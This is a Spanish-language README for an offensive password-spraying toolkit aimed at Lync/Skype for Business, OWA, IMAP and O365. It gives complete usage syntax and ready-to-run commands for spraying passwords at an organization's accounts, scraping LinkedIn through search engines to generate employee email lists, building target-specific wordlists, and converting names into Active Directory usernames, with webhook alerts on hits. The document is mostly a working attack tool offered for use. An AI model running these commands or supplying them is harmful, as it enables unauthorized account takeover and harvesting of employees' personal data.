
Scripts para hacer que los ataques de rociado de contraseñas contra Lync/S4B, OWA y O365 sean mucho más rápidos, menos dolorosos y más eficientes.
Este proyecto ya no recibe mantenimiento. Los siguientes proyectos alternativos son mejores y se mantienen activamente:
Un conjunto de scripts/utilidades de Python que intenta hacer que los ataques de spraying de contraseñas contra Lync/S4B y OWA sean mucho más rápidos, menos dolorosos y más eficientes.
¡Ven a pasar el rato en Discord!
Instala los requisitos previos con pip3 de la siguiente manera:
sudo -H pip3 install -r requirements.txt
O usa un entorno virtual de Python si no quieres instalar los paquetes globalmente.
Un rociador de contraseñas extremadamente rápido para Lync/Skype For Business y OWA, construido sobre Asyncio y Python 3.7
Uso:
atomizer (lync|owa|imap) <target> <password> <userfile> [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>] [--targetPort PORT][--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --user-as-pass USERFILE [--targetPort PORT] [--threads THREADS] [--debug]
atomizer (lync|owa|imap) <target> --recon [--debug]
atomizer -h | --help
atomizer -v | --version
Argumentos:
target dominio o URL objetivo
password contraseña a rociar
userfile archivo que contiene nombres de usuario (uno por línea)
passwordfile archivo que contiene contraseñas (una por línea)
Opciones:
-h, --help muestra esta pantalla
-v, --version muestra la versión
-c, --csvfile CSVFILE archivo csv que contiene nombres de usuario y contraseñas
-i, --interval TIME rocía en el intervalo especificado [formato: "H:M:S"]
-t, --threads THREADS número de hilos concurrentes a usar [predeterminado: 3]
-d, --debug habilita la salida de depuración
-p, --targetPort PORT puerto objetivo del servidor IMAP (solo IMAP) [predeterminado: 993]
--recon solo recopila información, no rocíes contraseñas
--gchat URL URL de webhook de gchat para notificaciones
--slack URL URL de webhook de slack para notificaciones
--user-row-name NAME título de la fila de nombre de usuario en el archivo CSV [predeterminado: Email Address]
--pass-row-name NAME título de la fila de contraseña en el archivo CSV [predeterminado: Password]
--user-as-pass USERFILE usa los nombres de usuario del archivo especificado como contraseña (uno por línea)
./atomizer.py owa contoso.com 'Fall2018' emails.txt
./atomizer.py lync contoso.com 'Fall2018' emails.txt
./atomizer lync contoso.com --csvfile accounts.csv
./atomizer lync contoso.com --user-as-pass usernames.txt
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
./atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>
Un port de la extensión GatherContacts de Burp de @OrOneEqualsOne a mitmproxy con algunas mejoras.
Extrae perfiles de LinkedIn de Google y Bing, genera automáticamente correos electrónicos a partir de los nombres de los perfiles usando el patrón especificado y realiza spraying de contraseñas en tiempo real.
(Construido sobre Atomizer)
mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'
Por defecto, email_format está establecido al patrón {first}.{last} y no es un argumento obligatorio.
El parámetro domain es el dominio a usar para generar correos electrónicos a partir de nombres; el parámetro target es el dominio o URL al que se le hará spraying de contraseñas.
Instala el certificado de mitmproxy, configura el proxy en tu navegador, ve a Google y/o Bing y busca (asegúrate de incluir /in):
site:linkedin.com/in "Target Company Name"
Los correos electrónicos se volcarán a emails.txt en el formato especificado y se pasarán a Atomizer para el spraying.
Extrae todo el texto del sitio web objetivo y lo envía a AWS Comprehend para su análisis y generar listas de palabras personalizadas para el spraying de contraseñas.
Aún es un trabajo en progreso
mitmdump -s aerosol.py --set domain=domain.com
Convierte nombres en nombres de usuario de Active Directory (p. ej., Alice Eve => CONTOSO\aeve)
Uso:
spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]
Argumentos:
file archivo que contiene nombres, también puede leer desde stdin
Opciones:
--target TARGET dominio o URL opcional para obtener el nombre de dominio interno de OWA
--domain DOMAIN especifica manualmente el dominio a añadir a cada nombre de usuario
--format FORMAT formato de nombre de usuario [predeterminado: {f}{last}]
Lee nombres desde STDIN; --domain se usa para especificar el dominio manualmente:
cat names.txt | ./spindrift.py --domain CONTOSO
Lee nombres de names.txt; --target obtiene dinámicamente el nombre de dominio interno de OWA (puedes proporcionar un dominio o URL)
./spindrift.py names.txt --target contoso.com